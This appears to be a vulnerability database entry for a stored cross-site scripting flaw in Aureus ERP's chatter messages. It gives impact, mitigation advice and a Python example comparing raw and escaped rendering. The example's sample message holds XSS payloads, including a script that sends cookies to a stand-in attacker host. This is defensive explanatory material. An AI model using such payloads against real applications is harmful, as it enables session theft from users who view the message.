CVE-2026-4175: Cross Site Scripting in Aureus ERP
A vulnerability was determined in Aureus ERP up to 1.3.0-BETA2. The affected element is an unknown function of the file plugins/webkul/chatter/resources/views/filament/infolists/components/messages/content-text-entry.blade.php of the component Chatter Message Handler. Manipulating the subject or body argument can lead to cross site scripting. The attack can be launched remotely. Upgrading to version 1.3.0-BETA1 is stated to fix this issue. The patch is commit 2135ee7efff4090e70050b63015ab5e268760ec8. It is suggested to upgrade the affected component.
AI Analysis
Technical Summary
CVE-2026-4175 is a cross-site scripting (XSS) vulnerability in Aureus ERP up to version 1.3.0-BETA2. The flaw is in the Chatter Message Handler component, in an unknown function of the Blade view plugins/webkul/chatter/resources/views/filament/infolists/components/messages/content-text-entry.blade.php. The user-controllable 'subject' and 'body' fields of a chatter message reach the rendered message content without adequate escaping, so an attacker who can submit a message can embed HTML and script that executes in the browser of every user who later views that message. Because the payload is persisted with the message, this behaves as stored XSS: one submission can hit many viewers, and execution in the victim's origin allows theft of session material, actions performed with the victim's privileges, or redirection to attacker-controlled sites. The attack can be launched remotely, but the published description does not state whether submitting a message requires an account; it does require user interaction, since a victim must open the view that renders the message. The CVSS 4.0 base score is 5.1 (medium). The advisory names 1.3.0-BETA1 as the fixed version while listing 1.3.0-BETA2 as affected; these version strings conflict, so the reliable reference is the fix commit 2135ee7efff4090e70050b63015ab5e268760ec8, and a deployment should be checked for that commit rather than for a version label. No public exploit has been reported to date, but the injection point is ordinary message input, so crafting one requires no special tooling.
Potential Impact
The XSS vulnerability in Aureus ERP compromises the confidentiality and integrity of user sessions by executing attacker-supplied script in the context of authenticated users who view a poisoned message. This enables session hijacking, unauthorized actions within the ERP (the script runs with whatever rights the viewing user holds, which for an ERP may include finance, purchasing or administrative functions), or in-application phishing aimed at internal staff. Because chatter messages are read by colleagues, a single malicious message can reach several privileged users, and the attacker does not need to target each victim individually. Exploitation does not directly affect availability, but actions taken through a hijacked session can disrupt business operations, expose sensitive business data, or provide a foothold for further attacks on the corporate network. Organizations running affected builds also face reputational damage and possible regulatory consequences if data is exposed or manipulated.
Mitigation Recommendations
Organizations should upgrade affected Aureus ERP installations to a build that contains fix commit 2135ee7efff4090e70050b63015ab5e268760ec8; the advisory's version labels (1.3.0-BETA2 affected, 1.3.0-BETA1 fixed) conflict, so confirm the commit is present in the deployed tree rather than trusting the version string alone. After patching, verify the fix by posting a harmless marker such as a tag that cannot execute into a chatter message subject and body and checking that the rendered message shows it as escaped text, not live markup. In addition, review custom plugins and extensions for the same pattern: any Blade view that outputs user-supplied content with unescaped output syntax rather than the default escaped syntax should be corrected, and rich-text fields should go through an HTML sanitizer with an allow-list. A Content Security Policy that disallows inline script reduces the impact of XSS but is defense in depth, not a substitute for output encoding. Regular security audits and code reviews of web-facing components that handle user-generated content are recommended. Monitoring application logs for script tags, event-handler attributes or javascript: URIs in message fields can surface exploitation attempts early. User awareness training about phishing and suspicious links reduces the risk from social engineering built on this vulnerability.
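The following is an added example, not code from Aureus ERP or from the Chatter plugin. It illustrates the rendering defect described in the Technical Summary (raw interpolation of a message's subject and body versus escaped output) and the post-patch verification step from the Mitigation Recommendations. The template strings, the sample attacker message and the probe marker are constructed stand-ins; the real content-text-entry.blade.php is not reproduced here. The escaping used mirrors what Blade's default output syntax applies, with the probe restricted to double quotes so that Python's html.escape produces the same entities as PHP's htmlspecialchars.

```python
"""Chatter-message XSS: unsafe vs escaped rendering, plus a fix-verification probe.

Added example; not Aureus ERP code. Templates below are constructed stand-ins
for a Blade view that renders a message's subject and body.
"""
import html
import secrets

# Constructed sample message as an attacker would submit it through the UI.
ATTACKER_MESSAGE = {
    "subject": 'Invoice <img src=x onerror="alert(document.cookie)">',
    "body": 'Please review <script>fetch("https://attacker.example/?c="+document.cookie)</script>',
}


def render_unsafe(message: dict) -> str:
    """Interpolates fields raw, the pattern of an unescaped Blade output tag.

    This is the vulnerable shape: attacker markup becomes part of the page.
    """
    return (
        '<div class="chatter-message">'
        f'<h4>{message["subject"]}</h4>'
        f'<p>{message["body"]}</p>'
        "</div>"
    )


def render_escaped(message: dict) -> str:
    """Encodes every field before output, the equivalent of Blade's default
    escaped output tag (htmlspecialchars with ENT_QUOTES in PHP)."""
    return (
        '<div class="chatter-message">'
        f'<h4>{html.escape(message["subject"], quote=True)}</h4>'
        f'<p>{html.escape(message["body"], quote=True)}</p>'
        "</div>"
    )


def make_probe(nonce: str) -> str:
    """A harmless, unique marker: a tag that cannot execute but is trivial to find.

    Only double quotes are used so PHP's htmlspecialchars and Python's
    html.escape produce the identical escaped form (&quot;).
    """
    return f'<i data-xss-probe="{nonce}"></i>'


def probe_state(page_html: str, probe: str) -> str:
    """Classify how the probe came back in a saved copy of the rendered page.

    'raw'     : the probe is present as live markup -> still vulnerable
    'escaped' : only the entity-encoded form is present -> output is encoded
    'absent'  : neither form found -> wrong page/view was captured, re-check
    """
    if probe in page_html:
        return "raw"
    if html.escape(probe, quote=True) in page_html:
        return "escaped"
    return "absent"


def check_build(render, nonce: str = None) -> str:
    """Run the probe through a renderer and report its state.

    In a real check, `render` is replaced by: submit make_probe(nonce) as the
    subject and body of a chatter message, open the message view, save the
    HTML, and call probe_state(saved_html, probe).
    """
    nonce = nonce or secrets.token_hex(8)
    probe = make_probe(nonce)
    page = render({"subject": probe, "body": probe})
    return probe_state(page, probe)


if __name__ == "__main__":
    print("unsafe renderer :", check_build(render_unsafe))   # raw
    print("escaped renderer:", check_build(render_escaped))  # escaped
    print(render_escaped(ATTACKER_MESSAGE))
```

The probe deliberately carries no script or event handler, so it can be posted to a production instance without harm; a result of 'raw' means the deployed build still interpolates message fields unescaped, 'escaped' means the field is encoded, and 'absent' means the captured page was not the view that renders the message. Escaping alone covers HTML body context; if a field is ever written into an attribute or a URL (for example a link target), it needs context-appropriate validation in addition to entity encoding.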
Affected Countries
United States, Germany, India, Brazil, United Kingdom, Canada, Australia, France, Japan, South Korea
Technical Details
- Data Version: 5.2
- Assigner Short Name: VulDB
- Date Reserved: 2026-03-14T15:15:06.380Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 69b68f139d4df451830604a3
Added to database: 3/15/2026, 10:50:59 AM
Last enriched: 3/23/2026, 12:30:39 AM
Last updated: 4/29/2026, 7:43:59 PM
Views: 113